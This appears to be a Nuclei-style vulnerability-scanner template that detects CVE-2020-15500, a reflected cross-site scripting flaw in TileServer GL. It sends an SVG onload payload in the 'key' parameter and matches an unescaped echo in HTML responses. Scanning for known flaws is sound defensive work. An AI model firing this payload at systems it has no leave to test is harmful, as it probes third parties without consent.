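# Detection template for CVE-2020-15500: reflected XSS in TileServer GL.
# The probe sends a marker payload in the `key` query parameter and reports a
# finding only when the server echoes that payload back unescaped in an HTML
# response.
id: CVE-2020-15500

info:
  name: TileServer GL Reflected XSS
  author: Akash.C
  severity: medium
  reference: https://nvd.nist.gov/vuln/detail/CVE-2020-15500
  source: https://github.com/maptiler/tileserver-gl/issues/461
  tags: cve,cve2020,xss,tileserver

requests:
  - method: GET
    path:
      # URL-encoded form of: '>"<svg/onload=confirm('xss')>
      - '{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E'

    # Every matcher below must hold before a finding is reported.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # A reflected value is only parsed as markup when the response is HTML,
      # so non-HTML responses are excluded.
      - type: word
        part: header
        words:
          - "text/html"

      # Match the complete decoded payload rather than only its first three
      # characters: the bare sequence '>" occurs in ordinary HTML and would
      # flag hosts that never reflected the parameter. A server that
      # HTML-escapes the value will not contain this string, which is the
      # intended negative result.
      - type: word
        part: body
        words:
          - "'>\"<svg/onload=confirm('xss')>"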